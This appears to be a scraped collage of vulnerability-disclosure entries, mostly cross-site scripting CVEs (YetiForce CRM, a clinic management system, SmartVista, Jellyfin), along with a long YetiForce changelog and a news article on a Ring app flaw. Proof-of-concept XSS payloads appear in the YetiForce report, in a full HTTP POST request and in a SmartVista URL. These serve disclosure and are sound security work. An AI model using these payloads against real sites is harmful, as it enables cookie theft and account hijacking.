The Transposh WordPress Translation WordPress plugin before 1.0.8 does not have CSRF check in its tp_translation AJAX action, which could allow attackers to make authorised users add a translation. Given the lack of sanitisation in the tk0 parameter, this could lead to a Stored Cross-Site Scripting issue which will be executed in the context of a logged in admin

CVE-2021-24912

Cross-site Scripting (XSS) - Stored in GitHub repository yetiforcecompany/yetiforcecrm prior to 6.4.0.

**Description**

The application uses Purify to avoid the Cross Site Scripting attack. However, On ApiAddress module from Settings, the customFields is not validated and it's used directly without any encoding or validation on ApiConfigModal.tpl. It allows attacker to inject arbitrary Javascript code to perform an Stored XSS attack.

**Proof of Concept**

1.  1- Login to the application

3.  2- Access the ApiAddress Module via the following URL:
4.  https://gitstable.yetiforce.com/index.php?module=ApiAddress&parent=Settings&view=Configuration
5.  3- Click to the button "Configure provider",
6.  Change the value of "map\_url" parameter with the following payload:

    https://www.attacker.com#"+onfocus="alert(document.domain)"+autofocus=""+"
    

6.  Or change the value of "country\_codes" with the following payload:

    "+onfocus="alert(document.domain)"+autofocus=""+"
    

5.  \*\*Inject the payload
6.   

**PoC Video**

https://drive.google.com/file/d/1Bb_-s_2ELyR87vfkhVjb0U0VThb7eOzZ/view?usp=sharing

**Vulnerable Code**

1.  1- The CustomFields is not validated and map\_url allow special characters: 
2.  2- The parameter is not encoded and use directly:
3.  

**Impact**

An XSS attack allows an attacker to execute arbitrary JavaScript in the context of the attacked website and the attacked user. This can be abused to steal session cookies, perform requests in the name of the victim or for phishing attacks.

**Occurrences**

CVE-2022-2890: Cross-site Scripting (XSS) - Stored in yetiforcecrm

Cross-site Scripting (XSS) - Reflected in GitHub repository bustle/mobiledoc-kit prior to 0.14.2.

Permalink

Browse files

Update dependencies 8/18/22 (#771)

\* Update devDependencies

\* Update mobiledoc-dom-renderer

\* pin

*   Loading branch information

gpoitch committed

Aug 18, 2022

1 parent c2df73e commit f3fdaa5352904fd2a0b4247ccb0dbf68aad43b5a

Showing **4 changed files** with **1,527 additions** and **1,091 deletions**.

*   package-lock.json
*   package.json
*   rollup.config.js
*   yarn.lock

**0 comments on commit f3fdaa5**

Please sign in to comment.

CVE-2022-2932: Update dependencies 8/18/22 (#771) · bustle/mobiledoc-kit@f3fdaa5

Permalink

Browse files

YetiForce CRM ver. 6.4.0 (#16359)

\* Added improvements in record collector

\* Integration with UaYouControl.php (#16293)

Co-authored-by: Mariusz Krzaczkowski <m.krzaczkowski@yetiforce.com>

\* Integration with UaYouControl.php (#16293)

\* Add external link to NoBrregEnhetsregisteret. (#16292)

\* Add external link to NoBrregEnhetsregisteret. #16292

\* Add NorthData to RecordCollectors. (#16278)

\* Add NorthData to RecordCollectors.

\* Change docs.

Co-authored-by: Mariusz Krzaczkowski <m.krzaczkowski@yetiforce.com>

\* Fix #16311

\* Added conditions wizard for 'Update related record' workflow action

\* Add NorthData to RecordCollectors. (#16278)

\* Code improvements

\* Added improvements in record collector

\* Zefix integraion \[in progress\] (#16281)

\* Zefix integraion \[in progress\]

\* ChZefix integration.

Co-authored-by: Mariusz Krzaczkowski <m.krzaczkowski@yetiforce.com>

\* Improved workflow action

\* Added improvements in record collector

\* Improvements in the store

\* Update RecordCollector tests

\* Code improvements

\* Improved ConfReport

\* languages/en-US/Other/RecordCollector.json

\* Improved change module type

\* Improved default dashboard in api portal

\* Fix Send PDF workflow task

\* Improved default dashboard in api

\* Fixed attachments in 'Emails to send' panel

\* lib\_roundcube 0.3.0 Roundcube Webmail 1.6.0

\* tests

\* tests

\* Update tests.yml

\* Added improvements in record collector

\* tests/setup/dependency.sh

\* .github/workflows/tests.yml

\* .github/workflows/tests.yml

\* .github/workflows/tests.yml

\* Code improvements

\* Update dependencies

\* Added minor improvements

\* tests

\* Added improvements in record collector

\* Added improvements in record collector

\* Added minor improvements

\* Added minor improvements

\* Added minor improvements

\* Improved import file button

\* Improved imap connection

\* Fix #16317 - list view entries count

\* Added minor code improvements

\* Improved menu items

\* Added improvements in record collector

\* Fix gantt view (#15772)

\* Added improvements in record collector

\* Added improvements in record collector

\* Added improvements in record collector

\* Updated graphics in store

\* Update install translations

\* Update fonts

\* Improved OSSMail template

\* Updated graphics in store

\* Update fonts

\* tests

\* tests Validator

\* Update icons

\* Improved widgets permissions (#15613)

\* Increase scrolling speed (#15031)

\* Added tracking to media management

\* Added improvements in record collector

\* Added improvements in record collector

\* Added improvements in record collector

\* Added minor code improvements

\* tests

\* Added minor code improvements

\* Fixed #15164 (#16319)

\* Some changes in Import module (#16318)

\* Code formatting

\* Added improvements in record collector

\* Change the library "sonata-project / google-authenticator" to "pragmarx/google2fa"

\* Update dependencies

\* Update dependencies

\* Updated \*.min and \*.map files

\* Change the library "sonata-project / google-authenticator" to "pragmarx/google2fa"

\* Added minor improvements in Composer::install

\* Update dev dependency

\* Added dropdown button to record collectors (#16322)

\* Corrected  Record collectors table width (#16323)

\* Fixed #15183 modulesMapRelatedFields don\`t work correct for multipicklist

\* Added minor improvements in Credits

\* Fix edit view header links

\* Improved Inventory panel and PDF widget

\* Added improvements in record collector

\* Added improvements in record collector

\* Update install translations

\* #16282 Improved the handler from getting coordinates to the map

\* Added minor code improvements

\* Fixed getting reference module in inventory name field (#16329)

\* Missing icons update

\* Improved tree field type

\* Improved tests and some code

\* Fix tree field type

\* Fix scheme for tree data table

\* Improved switch users

\* Improved YetiForce CLI

\* \[PROD\](renovate) Update dependency github/super-linter to v4.9.6 (#16324)

Co-authored-by: renovate\[bot\] <29139614+renovate\[bot\]@users.noreply.github.com>

\* Bump giggsey/libphonenumber-for-php from 8.12.52 to 8.12.53 (#16331)

Bumps \[giggsey/libphonenumber-for-php\](https://github.com/giggsey/libphonenumber-for-php) from 8.12.52 to 8.12.53.
- \[Release notes\](https://github.com/giggsey/libphonenumber-for-php/releases)
- \[Commits\](giggsey/libphonenumber-for-php@8.12.52...8.12.53)

---
updated-dependencies:
- dependency-name: giggsey/libphonenumber-for-php
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot\[bot\] <support@github.com>

Co-authored-by: dependabot\[bot\] <49699333+dependabot\[bot\]@users.noreply.github.com>

\* Improved switch users

\* Improved switch users

\* Unused code has been removed

\* Fix tree field type

\* Added improvements in record collector

\* Improved integration with DAV

\* Improved conditions wizard for 'Update related record' workflow action

\* Fixed focus to search text field when click on select2 drop down in modal window

\* Added improvements in record collector

\* Added minor code improvements

\* Improved ConfReport

\* Improved .htaccess

\* Added minor code improvements

\* Improved ConfReport

\* Fix icon on tree field type and change icon management view

\* Removed unused code. "Is added" - condition in workflows (#16321)

\* Correct setting of check boxes of Inventory boolean fields depending on their values. (#16326)

\* Update Inventory.js
Now the check-boxes of Inventory boolean fields will be set correctly regarding to their content.

\* README.md (#16332)

\* Improve inventory auto fill

\* Improved getting data from smtp (#16334)

\* Fixed #13136 (#16335)

\* Improved DB structure for map table cache

\* Improved updating payment status (#16327)

\* Improved updating payment status

\* Corrected translation (#16336)

\* Removed translation (#16337)

\* A functionality has been added to unlock e-mail accounts

\* Fix #13486

\* Update dependencies

\* mbstring.func\_overload

\* Added priority to CalendarActivities and OverdueActivities dashboard … (#16276)

\* Added priority to CalendarActivities and OverdueActivities dashboard widgets

\* Added improvement

\* Hidden icon for previewing replies in comments (#16339)

\* The display of the multi email field has been improved

\* Added working time counter widget. (#16316)

\* Added working time counter widget.

\* Added translation

\* Added improvements

\* Removed varialbe

\* Corrected comment

\* Added title to buttons

\* Added type to variable

\* Removed redundant characters

\* Added working time counter widget. #16316

\* Added minor improvements

\* Improoved dashboard titles

\* Updated \*.min and \*.map files

\* Added minor improvements in languages

\* Updated translation

\* Improvements have been added to the integration with WAPRO ERP

\* Update install translations

\* Update translations

\* Update translations

\* Added improvements in record collector

\* Added improvements in record collector

\* Improved input data cleanup

\* Improved RSS

\* Improved Rss

\* Update all Yarn dependencies (2022-08-15) (#16344)

Co-authored-by: depfu\[bot\] <23717796+depfu\[bot\]@users.noreply.github.com>

\* Added improvements in record collector

\* Improvements in the mechanism of generating PDF files

\* YetiForcePDF update v0.1.40 & Update dependencies

\* Improved some config templates

\* Added minor improvements

\* Remove unnecessary code

\* .github/workflows/actions.yml

\* .github/workflows/actions.yml

\* .github/workflows/tests.yml

\* .github/workflows/tests.yml

\* .github/workflows/tests.yml

\* Improved Db importer/updater

\* Added buttons to the Working hours counter widget (#16340)

\* Added buttons to the Working hours counter widget

\* Added translations

\* Improved widget

\* Added button lock when starting timing

\* Update translations

\* Added missing translation

\* .github/workflows/tests.yml

\* .github/workflows/tests.yml

\* .github/workflows/tests.yml

\* Added missing translation

\* .github/workflows/tests.yml

\* Removed Translation (#16347)

Co-authored-by: Radosław Skrzypczak <r.skrzypczak@yetiforce.com>

\* Update install translations

\* Added minor improvement in get actual version of PHP

\* Update install translations

\* Updated \*.min and \*.map files

\* Redundant code has been removed

\* .github/workflows/tests.yml

\* .github/workflows/tests.yml

\* .github/workflows/tests.yml

\* Improved RSS

\* Added improvements

\* Update DEV dependencies

\* Fix Completions initialization in comments widget (#16348)

\* Update fonts

\* Fixed sending files in API for PUT method

\* Update DEV dependencies

\* Improved valid of time in Business Hours (#16351)

\* Improved executing workflow when an unsupported operator is selected (#16352)

\* Improved executing workflow when an unsupported operator is selected

\* Improved getting translation (#16350)

\* Improved Importer

\* Improved working time counter widget

\* Improved api

\* Expansion of the tests

\* Expansion of the tests

\* tests

\* Update DEV dependencies

\* Improved Rss

\* tests

\* Value display secured

\* Added improvements

\* Improved index name

\* Improved validation of quantity field (#16355)

\* Improved validation of quantity field

\* Improved code

\* Add missing picklist dependencies

\* Added  validation whether at least one business day has been selected in the Business hours module (#16356)

\* Compile js

\* Moved swagger file

\* Improved swagger generating functions

\* Added minor improvements

\* Fixed issue with date format

\* Added improvements

\* Fixed a bug when selecting all users in the calendar quick edit view (#16357)

\* Improved swagger generating functions

\* Added improvements

\* Added improvements

\* Added improvements

\* Improved Address Search panel

\* Improved Emails to send panel

\* Fix action name

\* Fix description in docBlock

\* tests/Settings/ApiAddress.php

\* Compile js

\* tests/Settings/ApiAddress.php

\* tests/Settings/ApiAddress.php

\* Remove html unnecessary class

\* Fixed #14266 (#16349)

\* \[PROD\](renovate) Update debian Docker tag to v11 (#16341)

Co-authored-by: renovate\[bot\] <29139614+renovate\[bot\]@users.noreply.github.com>

\* Improved anonymization

\* Added improvements

\* Update install translations

\* Improved config class

\* Added improvements

\* Improved generatedtype for some fields

\* Fixed #15631 (#16358)

\* Added improvements

\* Improved block sequence

\* 6.4.0

Co-authored-by: rembiesa <103192653+rembiesa@users.noreply.github.com>
Co-authored-by: Radosław Skrzypczak <r.skrzypczak@yetiforce.com>
Co-authored-by: Adrian Koń <a.kon@yetiforce.com>
Co-authored-by: bmankowski <bmankowski@gmail.com>
Co-authored-by: Arek Solek <arkadiusz\_s9887@wp.pl>
Co-authored-by: renovate\[bot\] <29139614+renovate\[bot\]@users.noreply.github.com>
Co-authored-by: dependabot\[bot\] <49699333+dependabot\[bot\]@users.noreply.github.com>
Co-authored-by: Jared Ramon Elizan <elizanjaredr@gmail.com>
Co-authored-by: depfu\[bot\] <23717796+depfu\[bot\]@users.noreply.github.com>

*   Loading branch information

CVE-2022-1340: YetiForce CRM ver. 6.4.0 (#16359) · YetiForceCompany/YetiForceCRM@2c14baa

Clinic's Patient Management System v1.0 is vulnerable to Cross Site Scripting (XSS) via patients.php.

Permalink

Cannot retrieve contributors at this time

**Title: Clinic's Patient Management System 1.0 Stored Cross-Site Scripting****Author: HeZhenKai****Date: 07.15.2022****Vendor: https://www.sourcecodester.com/users/tips23****Software:**

https://www.sourcecodester.com/php-clinics-patient-management-system-source-code

#Description： #The Line 10 of patients.php sends unvalidated data to a web browser, which can result in the browser executing malicious code.

#echo $patients->address;

#PoC：

    POST /pms/patients.php HTTP/1.1
    Host: 192.168.1.19
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    DNT: 1
    Referer: http://192.168.1.19/pms/patients.php
    Cookie: _ga=GA1.1.1382961971.1655097107; PHPSESSID=cqb92r4af78v6laio9hqjs261t
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 160
    
    patient_name=1&address=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&cnic=1&date_of_birth=07%2F21%2F2022&phone_number=1&gender=Male&save_Patient=

CVE-2022-36251: bug_report/XSS-1.md at main · ZhenKaiHe/bug_report

**Cross site scripting in yetiforce/yetiforce-crm**

Moderate severity GitHub Reviewed Published Aug 22, 2022 • Updated Aug 30, 2022

GHSA-rjvc-mf7r-ch7r: Cross site scripting in yetiforce/yetiforce-crm

CVE-2022-2885

In Jellyfin before 10.8, the /users endpoint has incorrect access control for admin functionality. This lack of access control can be leveraged to performe a cross site scripting attack.

**Incorrect Access Control and Cross Site Scripting in Jellyfin**

High severity GitHub Reviewed Published Aug 20, 2022 • Updated Aug 30, 2022

GHSA-qwp3-5fw3-5wgv: Incorrect Access Control and Cross Site Scripting in Jellyfin

Multiple reflected XSS vulnerabilities occur when handling error message of BPC SmartVista version 3.28.0 allowing an attacker to execute javascript code at client side.

An attacker sends a draft URL https://\[URL\]/svcl/pages/monitoring/printingController.xhtml?javax.faces.partial.ajax=true&javax.faces.source=mainform%3AactiveProcesses&javax.faces.partial.execute=mainform%3AactiveProcesses&javax.faces.partial.render=mainform%3AactiveProcesses&mainform%3AactiveProcesses=mainform%3AactiveProcesses&mainform%3AactiveProcesses\_pagination=true&mainform%3AactiveProcesses\_first=6"\]\]><x:script+xmlns%3ax%3d"http%3a//www.w3.org/1999/xhtml">alert(document.domain)</x%3ascript>&mainform%3AactiveProcesses\_rows=6&mainform%3AactiveProcesses\_skipChildren=true&mainform%3AactiveProcesses\_encodeFeature=true&mainform=mainform&mainform%3AactiveProcesses\_selection=&mainform%3AactiveProcesses\_scrollState=0%2C0&mainform%3Abatches\_selection=&mainform%3Abatches\_scrollState=0%2C0&mainform%3AprintEntries\_selection=&mainform%3AprintEntries\_scrollState=0%2C0&javax.faces.ViewState=0000000000000000000%3A0000000000000000000 to victim. When victim opens the URL, XSS will be triggered. In this URL, the javax.faces.ViewState parameter can be modified to have random value but having same length as value generated by application

CVE-2022-35554: Reflected XSS in SmartVista Cardgen version 3.28.0 (CVE-2022-35554)

By Deeba Ahmed
The vulnerability was discovered by Atlanta-based app security firm Checkmarx while assessing the Ring doorbell app for Android.…
This is a post from HackRead.com Read the original post: Critical Amazon Ring Vulnerability Could Expose Camera Recordings

****The vulnerability was discovered by Atlanta-based app security firm Checkmarx while assessing the Ring doorbell app for Android.****

In May 2022, **Amazon** was alerted about a high-severity security flaw in its hugely popular home security-oriented Ring app for Android. The vulnerability could allow attackers to access camera recordings from Ring and extract sensitive data.

For your information, the Ring camera app allows homeowners to monitor video recordings from the doorbells and security cameras and boasts over 10 million downloads.

The vulnerability was discovered by an Atlanta-based app security firm Checkmarx while assessing the Ring doorbell app for Android. The flaw could expose sensitive user data, including the following:

*   Address
*   Full name
*   Geolocation
*   Email address
*   Phone number

Although Amazon quickly fixed the vulnerability in the same month when it was discovered, the details of it were only shared on August 18th by Checkmarx.

According to the company’s **blog post**, it was a cross-site scripting flaw that could be exploited in an attack chain to trick victims into installing an infected app. This app could hand over the Authorization Token of the device and extract the session cookie by sending the information with the device’s hardware ID to this endpoint– “ringcom/mobile/authorize.”

The victim is tricked into installing that app, which allows the attacker to collect authentication cookies. These cookies would allow the attacker to access a user’s account without entering the password.

Resultantly, the malicious app could steal the Ring user’s private information, geolocation data, and camera recordings, including files and computer screens visible to the app’s camera. The malicious actor may also track the homeowners’ movements inside the rooms or the building.

Checkmarx researchers found multiple bugs in the Ring Android app, which could collectively allow attackers to exploit the app and its users with a malicious app or an update to an existing app running on the device.

Checkmarx reported this issue on 1 May 2022, and Amazon fixed it on 27 May in version 3.5.1.0 of the Ring Android app. Ring spokesperson Claudia Fellerman told TechCrunch that this “extremely difficult” to **exploit vulnerability** wasn’t used in real-world attacks, and customer data wasn’t exposed.

> “Based on our review, no customer information was exposed. This issue would be extremely difficult for anyone to exploit because it requires an unlikely and complex set of circumstances to execute.”
> 
> Checkmarx

1.  **ThroughTek Flaw Exposed Millions of IoT Cameras to Spying**
2.  **Leaky database exposes fake Amazon product reviews scam**
3.  **Amazon sent 1,700 audio recordings of Alexa user to a stranger**
4.  **3TB of clips from exposed home security cameras posted online**
5.  **Whitehat hacker shows how to detect hidden cameras in Airbnb, hotels**

Tag

#xss